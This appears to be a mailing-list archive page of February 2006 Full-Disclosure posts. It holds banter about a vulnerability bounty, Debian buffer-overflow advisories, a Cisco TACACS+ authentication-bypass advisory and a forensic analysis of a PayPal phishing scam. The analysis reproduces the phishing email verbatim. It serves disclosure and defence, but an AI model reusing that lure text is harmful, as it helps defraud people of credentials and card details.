PGP-Key: http://pgp.mit.edu:11371/pks/lookup?search=lmeinersop=index signature.asc Description: This is a digitally signed message part ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] iDefense Labs Quarterly Hacking Challenge
Gee, I wonder how much money iDefense is going to make from this? -simon [EMAIL PROTECTED] wrote: iDefense Labs is pleased to announce the launch of our quarterly hacking challenge. Going forward, on a quarterly basis, we will select a new focus for the challenge and outline the rules for vulnerability discoveries that will qualify for the monetary rewards. For the current quarter, iDefense Labs will pay $10,000 for each vulnerability submission that results in the publication of a Microsoft Security Bulletin with a severity rating of critical. In order to qualify, the submission must be received by midnight EST on March 31, 2006. The $10,000 prizes will be paid out following the publication of the Microsoft Security Bulletin and will be paid in addition to any amount paid for the vulnerability when it is initially accepted. Further details on the iDefense Vulnerability Contributor Program (VCP) can be found at: http://labs.idefense.com/vcp.php Further information about iDefense Labs, including access to open source tools can be found at: http://labs.idefense.com Michael Sutton Director, iDefense Labs ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] CYBSEC - Security Pre-Advisory: Arbitrary File Read/Delete in SAP BC
Thats probably not a good idea... You could end up with a situation like this: http://www.idefense.com/intelligence/vulnerabilities/display.php?id=324 -KF 3. Running the JVM setuid root. ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] iDefense Labs Quarterly Hacking Challenge
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 zdi is step up to ;] Simon Smith wrote: Gee, I wonder how much money iDefense is going to make from this? -simon [EMAIL PROTECTED] wrote: iDefense Labs is pleased to announce the launch of our quarterly hacking challenge. Going forward, on a quarterly basis, we will select a new focus for the challenge and outline the rules for vulnerability discoveries that will qualify for the monetary rewards. For the current quarter, iDefense Labs will pay $10,000 for each vulnerability submission that results in the publication of a Microsoft Security Bulletin with a severity rating of critical. In order to qualify, the submission must be received by midnight EST on March 31, 2006. The $10,000 prizes will be paid out following the publication of the Microsoft Security Bulletin and will be paid in addition to any amount paid for the vulnerability when it is initially accepted. Further details on the iDefense Vulnerability Contributor Program (VCP) can be found at: http://labs.idefense.com/vcp.php Further information about iDefense Labs, including access to open source tools can be found at: http://labs.idefense.com Michael Sutton Director, iDefense Labs ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2 (MingW32) iQIVAwUBQ/MwMq+LRXunxpxfAQLPLw//f/fg4HzYRq/ZT86SR3W2kmgPlvvPwjGw 6N6vBI9l0e73U/boYxuLZZpNeTHbMvT2w8V2M7nJ14w+3V30UZq1qeOlxCmJGa7x jvmruCCQZOpqG02LKPM1ycCTSx07I5v8rC0mYtPO6Wiw6gg98mZGqt5c6e/79l/5 40BeIYSpQGP6FwbYXv59wTEbC2U+jvT/qmiJ65q5ZRMRT0mEIsdAqqVfmnc3OwXd CtBB/cvQGubAKck2RbytyurR5b3kKNAQBw8OODGtJHEoSj3cgGcvjnGvvEf6b1FG 8c5vx6bmGU9y/D+16EHXICjeQV9AgGjuO/wslz/0cWz9iQ+/vhRgzwg7uZQ5Qikm M9yURwU4LoJjzQ1GQvtPGenyrGRCWAwAsOOp9VmfuQlG1vwizClXy/+lxyd0faus 2ZagW9yc1Lgpqz9ekjNHZ0favqkz4gUKIHvIGESdUvNhrDHy/g3uJhQwJjf1w+s3 IpjVnue72jJjFELeFKSxTsfXrfR0pJThc2lUhSiGskDuwkPDAiSFt8D7SRMWWRNo vpcEwstan/Jei1VIDJ8/+W1KD35G1h9pCY5nJoRxruC+J/yWpDp2hwKG+5rlsmEC RmR1SiiljdCu5EfKq0pQz8ywv+jlElUaZcFg/NDGmppmx6ISdwtWrMy1MMConjy1 48/rVH+Lc3M= =6/15 -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 975-1] New nfs-user-server packages fix arbitrary code execution
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 975-1 [EMAIL PROTECTED] http://www.debian.org/security/ Moritz Muehlenhoff February 15th, 2006 http://www.debian.org/security/faq - -- Package: nfs-user-server Vulnerability : buffer overflow Problem-Type : remote Debian-specific: no CVE ID : CVE-2006-0043 Debian Bug : 350020 Marcus Meissner discovered that attackers can trigger a buffer overflow in the path handling code by creating or abusing existing symlinks, which may lead to the execution of arbitrary code. This vulnerability isn't present in the kernel NFS server. This update includes a bugfix for attribute handling of symlinks. This fix does not have security implications, but at the time when this DSA was prepared it was already queued for the next stable point release, so we decided to include it beforehand. For the old stable distribution (woody) this problem has been fixed in version 2.2beta47-12woody1. For the stable distribution (sarge) this problem has been fixed in version 2.2beta47-20sarge2. For the unstable distribution (sid) this problem has been fixed in version 2.2beta47-22. We recommend that you upgrade your nfs-user-server package. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.0 alias woody - Source archives: http://security.debian.org/pool/updates/main/n/nfs-user-server/nfs-user-server_2.2beta47-12woody1.dsc Size/MD5 checksum: 727 f4971401042d4274c2cb4849c3322593 http://security.debian.org/pool/updates/main/n/nfs-user-server/nfs-user-server_2.2beta47-12woody1.diff.gz Size/MD5 checksum: 8752 9380de4b1fd8936dc4b19af0b57040b6 http://security.debian.org/pool/updates/main/n/nfs-user-server/nfs-user-server_2.2beta47.orig.tar.gz Size/MD5 checksum: 198202 79a29fe9f79b2f3241d4915767b8c511 Alpha architecture: http://security.debian.org/pool/updates/main/n/nfs-user-server/nfs-user-server_2.2beta47-12woody1_alpha.deb Size/MD5 checksum: 119962 37cfb09732006201cde06683d2a9a4d9 http://security.debian.org/pool/updates/main/n/nfs-user-server/ugidd_2.2beta47-12woody1_alpha.deb Size/MD5 checksum:26790 103f998c7a540b9ac7062b6f62665671 ARM architecture: http://security.debian.org/pool/updates/main/n/nfs-user-server/nfs-user-server_2.2beta47-12woody1_arm.deb Size/MD5 checksum: 100406 0edad22179223402ac88f45fda7d1c7d http://security.debian.org/pool/updates/main/n/nfs-user-server/ugidd_2.2beta47-12woody1_arm.deb Size/MD5 checksum:25010 c42c15bad3488459267edb127bae00db Intel IA-32 architecture: http://security.debian.org/pool/updates/main/n/nfs-user-server/nfs-user-server_2.2beta47-12woody1_i386.deb Size/MD5 checksum:97778 ec19dcb4ae4acc430555962d728e326e http://security.debian.org/pool/updates/main/n/nfs-user-server/ugidd_2.2beta47-12woody1_i386.deb Size/MD5 checksum:25030 a7091d7be5eb9dd028efd7583a9af598 Intel IA-64 architecture: http://security.debian.org/pool/updates/main/n/nfs-user-server/nfs-user-server_2.2beta47-12woody1_ia64.deb Size/MD5 checksum: 140182 88fa7ef8e9993c8660506f2e90b28f85 http://security.debian.org/pool/updates/main/n/nfs-user-server/ugidd_2.2beta47-12woody1_ia64.deb Size/MD5 checksum:28224 c4b5fa3f0dcab42a066eea6366dae92d HP Precision architecture: http://security.debian.org/pool/updates/main/n/nfs-user-server/nfs-user-server_2.2beta47-12woody1_hppa.deb Size/MD5 checksum: 112212 796f3f24a5eb4b618e0cf831d06cbd29 http://security.debian.org/pool/updates/main/n/nfs-user-server/ugidd_2.2beta47-12woody1_hppa.deb Size/MD5 checksum:25880 bd51ab530c8a099dc077888a86f656e7 Motorola 680x0 architecture: http://security.debian.org/pool/updates/main/n/nfs-user-server/nfs-user-server_2.2beta47-12woody1_m68k.deb Size/MD5 checksum:94898 4b63d1ee24bdc0dbd75513bcd650894f http://security.debian.org/pool/updates/main/n/nfs-user-server/ugidd_2.2beta47-12woody1_m68k.deb Size/MD5 checksum:24930 5d2768fb43739ef682561e2399ee2cd0 Big endian MIPS architecture: http://security.debian.org/pool/updates/main/n/nfs-user-server/nfs-user-server_2.2beta47-12woody1_mips.deb Size/MD5 checksum: 111030 459c4f52cdd13b0cf1917d142d0c03b2
[Full-disclosure] Forensic Analysis of a Paypal Phishing Scam
Hello all, I recently received this e-mail notifying me of a new e-mail address that was added to my Paypal account. I broke down the steps I took to analyze the e-mail first to identify that it was a phishing scam and then to track down the steps this Scammer used and identify the systems in use. I have provided the e-mail and a synopsis along with a link to the original full forensics. Synopsis: 1. The e-mail was sent from a Comcast network in Indianapolis from a windows machine running outlook express. The Scammer used a Yahoo name on the account. 2. The domain was registered through a proxy domain registration company which uses Yahoo's DNS and provided a web server through Yahoo. 3. The Yahoo web server redirects the user to an Oracle web server on port 84 running in Seoul, Korea. 4. Finally, when you put in your username and password it tells you the system is down for maintenance, but does take the time to ask you for your credit card and pin numbers! Notes: The Scammer does use an interesting approach in eliminating the address bar and using a graphics of an address bar in it's place showing a Paypal login account. To see the the full analysis click here: http://dsb.igxglobal.com/plugins/content/content.php?content.37 Babak Pasdar Founder / Chief Technology Information Security Officer Support the Daily Security Briefing Web Site and Register Here: http://dsb.igxglobal.com For this week's DSB/Week-in-Review Audio/Video Security Report: http://dsb.igxglobal.com/news.php?item.50.4 To register for a Daily Security Intelligence e-mail: http://www.igxglobal.com/dsb/register.html Get your security news via Podcast: http://dsb.igxglobal.com/page.php?11 Return-Path: [EMAIL PROTECTED] Received: from groupware.igxglobal.com ([unix socket]) by groupware (Cyrus v2.1.16) with LMTP; Tue, 14 Feb 2006 11:48:09 -0500 X-Sieve: CMU Sieve 2.2 Received: from mail5.igxglobal.com (unknown [192.168.27.51]) by groupware.igxglobal.com (Postfix) with ESMTP id 910DD32C082 for [EMAIL PROTECTED]; Tue, 14 Feb 2006 11:48:09 -0500 (EST) Received: from c-68-58-4-141.hsd1.in.comcast.net (HELO compaq) ([68.58.4.141]) by mail5.igxglobal.com with SMTP; 14 Feb 2006 11:48:09 -0500 Message-Id: [EMAIL PROTECTED] X-BrightmailFiltered: true X-Brightmail-Tracker: AA== X-IronPort-AV: i=4.02,114,1139202000; d=scan'208,217; a=4072399:sNHT36133904 Reply-To: [EMAIL PROTECTED] From: PayPal Security [EMAIL PROTECTED] Subject: New email address added to your account ! Date: Tue, 14 Feb 2006 11:48:06 -0500 MIME-Version: 1.0 Content-Type: text/html; charset=Windows-1251 Content-Transfer-Encoding: 7bit X-Priority: 1 X-MSMail-Priority: High X-Mailer: Microsoft Outlook Express 6.00.2600. X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600. To: undisclosed-recipients : ; X-Evolution-Source: imap://bpasdar;[EMAIL PROTECTED]/ You've added an additional email address to your PayPal account. If you don’t agree with this email [EMAIL PROTECTED] and if you need assistance with your account, please click here to login to your account. To make sure you can use your PayPal account the next time you make a purchase, all you need to do is confirm or not your email address. If your email program has problems with hypertext links, you may also confirm your email address by logging in to your account. Thank you for using PayPal! The PayPal Team Please do not reply to this email. This mailbox is not monitored and you will not receive a response. For assistance, log in to your PayPal account and click the Help link located in the top right corner of any PayPal page. PayPal Email ID PP059 HEMFBKCMCUNCRVRFYOEGZWKZKENTMXZBPDSJBD signature.asc Description: This is a digitally signed message part _ igxglobal utilizes state of the art technology from PGP to ensure the safeguard of all electronic correspondences. This message could have been secured by PGP Universal. To secure future messages from this sender, please click this link and contact your representative at igxglobal for further information: https://keys.igxglobal.com/b/b.e?r=full-disclosure%40lists.grok.org.ukn=4Njq7juzEf1Yn9MHjRn9Ow%3D%3D ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] [SECURITY] [DSA 976-1] New libast packages fix arbitrary code execution
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 976-1 [EMAIL PROTECTED] http://www.debian.org/security/ Martin Schulze February 15th, 2006 http://www.debian.org/security/faq - -- Package: libast, libast1 Vulnerability : buffer overflow Problem type : local Debian-specific: no CVE ID : CVE-2006-0224 Johnny Mast discovered a buffer overflow in libast, the library of assorted spiffy things, that can lead to the execution of arbitary code. This library is used by eterm which is installed setgid uid which leads to a vulnerability to alter the utmp file. For the old stable distribution (woody) this problem has been fixed in version 0.4-3woody2. For the stable distribution (sarge) this problem has been fixed in version 0.6-0pre2003010606sarge1. For the unstable distribution (sid) this problem will be fixed soon. We recommend that you upgrade your libast packages. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 3.0 alias woody - Source archives: http://security.debian.org/pool/updates/main/liba/libast1/libast1_0.4-3woody2.dsc Size/MD5 checksum: 611 7ae117d391242963294499b684e783b6 http://security.debian.org/pool/updates/main/liba/libast1/libast1_0.4-3woody2.diff.gz Size/MD5 checksum: 127092 fd7f99bde6a540fe50c27761b63e27cf http://security.debian.org/pool/updates/main/liba/libast1/libast1_0.4.orig.tar.gz Size/MD5 checksum: 150283 9424286314c1d816699b28964b91d015 Alpha architecture: http://security.debian.org/pool/updates/main/liba/libast1/libast1_0.4-3woody2_alpha.deb Size/MD5 checksum:30314 549273ceedb6d3836361ec4308df13b7 http://security.debian.org/pool/updates/main/liba/libast1/libast1-dev_0.4-3woody2_alpha.deb Size/MD5 checksum:46418 324e44548cf1c1ae9befb810f3ebc3cc ARM architecture: http://security.debian.org/pool/updates/main/liba/libast1/libast1_0.4-3woody2_arm.deb Size/MD5 checksum:28496 702865048ba5822eef10de3cd9007819 http://security.debian.org/pool/updates/main/liba/libast1/libast1-dev_0.4-3woody2_arm.deb Size/MD5 checksum:37076 e454fa52adb41c91c0e9b806caf1418c Intel IA-32 architecture: http://security.debian.org/pool/updates/main/liba/libast1/libast1_0.4-3woody2_i386.deb Size/MD5 checksum:24804 cb4f324b197dad2f1069af530e1f7051 http://security.debian.org/pool/updates/main/liba/libast1/libast1-dev_0.4-3woody2_i386.deb Size/MD5 checksum:33096 2eae854498d4ee6a27badcf8603cab7e Intel IA-64 architecture: http://security.debian.org/pool/updates/main/liba/libast1/libast1_0.4-3woody2_ia64.deb Size/MD5 checksum:37426 fab097ad84832a872a0af9f6b61a4db7 http://security.debian.org/pool/updates/main/liba/libast1/libast1-dev_0.4-3woody2_ia64.deb Size/MD5 checksum:47926 530f9e8878f21ee1f2dbcb0dbd16db7d HP Precision architecture: http://security.debian.org/pool/updates/main/liba/libast1/libast1_0.4-3woody2_hppa.deb Size/MD5 checksum:30870 9c9be1baeb94f828c281db145cac7e45 http://security.debian.org/pool/updates/main/liba/libast1/libast1-dev_0.4-3woody2_hppa.deb Size/MD5 checksum:45820 e782f8f5846a48d7eb8a2791c61255e8 Motorola 680x0 architecture: http://security.debian.org/pool/updates/main/liba/libast1/libast1_0.4-3woody2_m68k.deb Size/MD5 checksum:25178 4293a0569fb9f3266e8644e332c1f2bf http://security.debian.org/pool/updates/main/liba/libast1/libast1-dev_0.4-3woody2_m68k.deb Size/MD5 checksum:32990 b78f08fede449151bde20f5b4ee82ea2 Big endian MIPS architecture: http://security.debian.org/pool/updates/main/liba/libast1/libast1_0.4-3woody2_mips.deb Size/MD5 checksum:24826 ccdf8838e4a6c7c7ecc29916d76af616 http://security.debian.org/pool/updates/main/liba/libast1/libast1-dev_0.4-3woody2_mips.deb Size/MD5 checksum:40754 9ea070dc4626dadb799bd45eeb27269b Little endian MIPS architecture: http://security.debian.org/pool/updates/main/liba/libast1/libast1_0.4-3woody2_mipsel.deb Size/MD5 checksum:24932 2b5ff0209b86917d9e31ca111e57dffb http://security.debian.org/pool/updates/main/liba/libast1/libast1-dev_0.4-3woody2_mipsel.deb Size/MD5 checksum:40440 ec95a2b1e72608b7deb882df9b7d7eef PowerPC
Re: [Full-disclosure] iDefense Labs Quarterly Hacking Challenge
$50,000 for reporting BSA that your neighbor uses an illegal version of Window$ ! https://reporting.bsa.org/usa/home.aspx ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Cisco Security Advisory: TACACS+ Authentication Bypass in Cisco Anomaly Detection and Mitigation Products
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Cisco Security Advisory: TACACS+ Authentication Bypass in Cisco Anomaly Detection and Mitigation Products Document ID: 69073 Advisory ID: cisco-SA-20060215-guard-auth http://www.cisco.com/warp/public/707/cisco-sa-20060215-guard.shtml Revision 1.0 Last Updated 2006 February 15 1600 UTC (GMT) For Public Release 2006 February 15 1600 UTC (GMT) - - Contents Summary Affected Products Details Impact Software Versions and Fixes Workarounds Obtaining Fixed Software Exploitation and Public Announcements Status of This Notice: FINAL Distribution Revision History Cisco Security Procedures - - Summary === A vulnerability in versions 5.0(1) and 5.0(3) of the software used in Cisco Anomaly Detection and Mitigation appliances and service modules may allow unauthorized users to get unauthorized access to the devices and/or escalate their privileges if Terminal Access Controller Access Control System Plus (TACACS+) is incompletely configured. TACACS+ authentication is disabled by default, and a device correctly configured for TACACS+ authentication is not affected by this vulnerability. Cisco has made free software available to address this vulnerability for affected customers. There are workarounds available to mitigate the effects of the vulnerability. This advisory is posted at http://www.cisco.com/warp/public/707/cisco-sa-20060215-guard.shtml . Affected Products = Vulnerable Products +-- This vulnerability affects versions 5.0(1) and 5.0(3) of the software for the Cisco Guard and Cisco Traffic Anomaly Detector appliances and the Anomaly Guard Module and Traffic Anomaly Detector Module for the Cisco Catalyst 6500 switches/Cisco 7600 routers if the devices are incompletely configured to use TACACS+ authentication. Please note that 5.0(2) was never released to cisco.com, which is the reason it is not listed as an affected release. Devices running an affected software version and configured for TACACS+ authentication are vulnerable if the Authentication, Authorization, and Accounting (AAA) command specifies TACACS+ authentication but the configuration lacks the tacacs-server host command that specifies the TACACS+ server. In other words, if the configuration includes either or both of the following commands: aaa authentication login tacacs+ local aaa authentication enable tacacs+ local but not the following command: tacacs-server host IP address of TACACS+ server the device is vulnerable. Note: The local authentication method specified after the tacacs+ authentication method in the aaa authentication commands above is unrelated to the vulnerability. This authentication method is shown because it is normally used as a fallback in case the TACACS+ server is not available. Devices maybe vulnerable, with or without a local authentication method, if the tacacs+ authentication method is used before the local method (if specified) and the configuration lacks the tacacs-server host command. Products Confirmed Not Vulnerable + The Cisco Guard and Cisco Traffic Anomaly Detector are not affected by this vulnerability if they are running the following software versions: * Versions of the Cisco Guard and Cisco Traffic Anomaly Detector software prior to 5.0. This includes any 3.x and 4.x release. * Cisco Guard and Cisco Traffic Anomaly Detector software version 5.1 and above. A Cisco Guard or Cisco Traffic Anomaly Detector running version 5.0 (1) or 5.0(3) is not affected if the device is not configured to authenticate users against a TACACS+ server, or if its TACACS+ configuration is complete, i.e. if the tacacs-server host command is present in the configuration. Note: TACACS+ authentication is disabled by default. If no explicit AAA configuration takes place the Cisco Guard and the Cisco Traffic Anomaly Detector will authenticate users against the local database (the local authentication method.) No other Cisco products are currently known to be affected by this vulnerability. Details === The Cisco Guard and Cisco Traffic Anomaly Detector appliances and the Anomaly Guard Module and Traffic Anomaly Detector Module for the Cisco Catalyst 6500 switches/Cisco 7600 routers are Distributed Denial of Service (DDoS) attack mitigation devices that detect the presence of a potential DDoS attack and divert attack traffic destined for the network being monitored without affecting the flow of legitimate traffic. The Cisco Guard and the Cisco Anomaly Traffic Detector appliances can be managed via a virtual terminal (standard keyboard and monitor attached directly to the appliance), a local serial console, remote Secure Shell (SSH) connections, and/or remote secure web
Re: [Full-disclosure] iDefense Labs Quarterly Hacking Challenge
On 2/15/06, Jerome Athias [EMAIL PROTECTED] wrote: $50,000 for reporting BSA that your neighbor uses an illegal version of Window$ ! That is entirely inaccurate. The $5 reward with numerous strings attached is for reporting a company using multiple pirated copies of software, reporting your neighbor+ apparently yeilds no reward other than flaming crap on your doorstep and RAT written on your windows :-P -sb https://reporting.bsa.org/usa/home.aspx ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] iDefense Labs Quarterly Hacking Challenge
Yeah, if Grandma next door gets hit with a $1,000,000 judgment. https://reporting.bsa.org/usa/rewardsconditions.aspx That's only 5%. The lawyers at the BSA probably take 40%. /mike. Jerome Athias wrote: $50,000 for reporting BSA that your neighbor uses an illegal version of Window$ ! https://reporting.bsa.org/usa/home.aspx ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Re: Re: Fun with Foundstone
[EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 what LOL ? what is surprising ? Not 'lol surprising', just 'lol amusing'. I'm a happy guy, I laugh a lot, and don't need much of a reason to! And two hours is a fairly fast reaction time to notice a post on one of (presumably) many lists that they subscribe to and take the vulnerable page offline. I thought that was good. cheers, DaveK -- Can't think of a witty .sigline today ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
[Full-disclosure] Re: Re: Fun with Foundstone
Debasis Mohanty wrote: Does this mean, Dave's age is inbetween 3 - 4 yrs ?? =) - D :-) That's so much more flattering than when people mistake me for the grey-haired man in his 60's who used to work for AT+T! Say, Deb, next time people ask me if I wrote the Korn Shell, can I quote your post to them? cheers, DaveK -- Can't think of a witty .sigline today ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] iDefense Labs Quarterly Hacking Challenge
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 nop totally wrong, I got 50k yesterday reporting my sister .. ;D Stan Bubrouski wrote: On 2/15/06, Jerome Athias [EMAIL PROTECTED] wrote: $50,000 for reporting BSA that your neighbor uses an illegal version of Window$ ! That is entirely inaccurate. The $5 reward with numerous strings attached is for reporting a company using multiple pirated copies of software, reporting your neighbor+ apparently yeilds no reward other than flaming crap on your doorstep and RAT written on your windows :-P -sb https://reporting.bsa.org/usa/home.aspx ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2 (MingW32) iQIVAwUBQ/OeLq+LRXunxpxfAQKTkxAA6rEaNbwSfOHMLVEUX8nWeci6haHkxxrG jLaQAqEEXeWiQr/qHi0hXg78bLGfOya0TnB7xj11iy9LNfwZzj7nOtLjBqM00+zW yGII5mePqteKhpHimTln3y4bP5mYn5vb4ETlqWhrZ4tyia9QqDbMlj+h+qXGAPlT gRQp2B4hAETFzsJLt9V/n2l52yGrYW6ZVWZLBjX1U+xtBQII7Xt2z1nulYT5xO2g B8aM6fRfD/h9rQspaxwmnGscEOnqiqSm5N5rudXzg68W92UyDrOJ4sQh4FMV4TdT 1hHVBpRrnN5eCtiZ7paaBhiFLwb6w6Cf59Sn8K7iyDZjpUueRFEV41pLtcjQbccj 4xRIXTt6+fCHmi6R2BT01qDJ6eCTQ/fd0WGlMCw0NXoUZqoJGUG5yyZ+wHVcqldC q5P4UnCaE2b0G9b1wiY3bUlntwyopwzjqmUbsqS57JhntI6Vq+YHzPx7kszzwQYf NEe5cPDCTfyqPIH53PziZpSS67twQX7mekC9tiDfmzfAaeiLUyLjFonm4sT58d9e gY1bX7bdnL+jCdWyrOjFajEccPTOYkc+WighGDnfW75sdcFfcIWLCaxqFnXGZPdR i8R8A3d3ooHAD9/iqTFn7IIIneQIPS43QlaYhpn/m/xf6sjkLxLSKMb1hwc0+0d9 xM4Xhsx3aAI= =ve/Z -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] iDefense Labs Quarterly Hacking Challenge
Class, I just made 50k reporting you ;) /str0ke On 2/15/06, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 nop totally wrong, I got 50k yesterday reporting my sister .. ;D Stan Bubrouski wrote: On 2/15/06, Jerome Athias [EMAIL PROTECTED] wrote: $50,000 for reporting BSA that your neighbor uses an illegal version of Window$ ! That is entirely inaccurate. The $5 reward with numerous strings attached is for reporting a company using multiple pirated copies of software, reporting your neighbor+ apparently yeilds no reward other than flaming crap on your doorstep and RAT written on your windows :-P -sb https://reporting.bsa.org/usa/home.aspx ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2 (MingW32) iQIVAwUBQ/OeLq+LRXunxpxfAQKTkxAA6rEaNbwSfOHMLVEUX8nWeci6haHkxxrG jLaQAqEEXeWiQr/qHi0hXg78bLGfOya0TnB7xj11iy9LNfwZzj7nOtLjBqM00+zW yGII5mePqteKhpHimTln3y4bP5mYn5vb4ETlqWhrZ4tyia9QqDbMlj+h+qXGAPlT gRQp2B4hAETFzsJLt9V/n2l52yGrYW6ZVWZLBjX1U+xtBQII7Xt2z1nulYT5xO2g B8aM6fRfD/h9rQspaxwmnGscEOnqiqSm5N5rudXzg68W92UyDrOJ4sQh4FMV4TdT 1hHVBpRrnN5eCtiZ7paaBhiFLwb6w6Cf59Sn8K7iyDZjpUueRFEV41pLtcjQbccj 4xRIXTt6+fCHmi6R2BT01qDJ6eCTQ/fd0WGlMCw0NXoUZqoJGUG5yyZ+wHVcqldC q5P4UnCaE2b0G9b1wiY3bUlntwyopwzjqmUbsqS57JhntI6Vq+YHzPx7kszzwQYf NEe5cPDCTfyqPIH53PziZpSS67twQX7mekC9tiDfmzfAaeiLUyLjFonm4sT58d9e gY1bX7bdnL+jCdWyrOjFajEccPTOYkc+WighGDnfW75sdcFfcIWLCaxqFnXGZPdR i8R8A3d3ooHAD9/iqTFn7IIIneQIPS43QlaYhpn/m/xf6sjkLxLSKMb1hwc0+0d9 xM4Xhsx3aAI= =ve/Z -END PGP SIGNATURE- ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] iDefense Labs Quarterly Hacking Challenge
haha wish you had I could sue you ;-) -sb On 2/15/06, str0ke [EMAIL PROTECTED] wrote: Class, I just made 50k reporting you ;) /str0ke On 2/15/06, [EMAIL PROTECTED] [EMAIL PROTECTED] wrote: -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 nop totally wrong, I got 50k yesterday reporting my sister .. ;D Stan Bubrouski wrote: On 2/15/06, Jerome Athias [EMAIL PROTECTED] wrote: $50,000 for reporting BSA that your neighbor uses an illegal version of Window$ ! That is entirely inaccurate. The $5 reward with numerous strings attached is for reporting a company using multiple pirated copies of software, reporting your neighbor+ apparently yeilds no reward other than flaming crap on your doorstep and RAT written on your windows :-P -sb https://reporting.bsa.org/usa/home.aspx ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -BEGIN PGP SIGNATURE- Version: GnuPG v1.4.2 (MingW32) iQIVAwUBQ/OeLq+LRXunxpxfAQKTkxAA6rEaNbwSfOHMLVEUX8nWeci6haHkxxrG jLaQAqEEXeWiQr/qHi0hXg78bLGfOya0TnB7xj11iy9LNfwZzj7nOtLjBqM00+zW yGII5mePqteKhpHimTln3y4bP5mYn5vb4ETlqWhrZ4tyia9QqDbMlj+h+qXGAPlT gRQp2B4hAETFzsJLt9V/n2l52yGrYW6ZVWZLBjX1U+xtBQII7Xt2z1nulYT5xO2g B8aM6fRfD/h9rQspaxwmnGscEOnqiqSm5N5rudXzg68W92UyDrOJ4sQh4FMV4TdT 1hHVBpRrnN5eCtiZ7paaBhiFLwb6w6Cf59Sn8K7iyDZjpUueRFEV41pLtcjQbccj 4xRIXTt6+fCHmi6R2BT01qDJ6eCTQ/fd0WGlMCw0NXoUZqoJGUG5yyZ+wHVcqldC q5P4UnCaE2b0G9b1wiY3bUlntwyopwzjqmUbsqS57JhntI6Vq+YHzPx7kszzwQYf 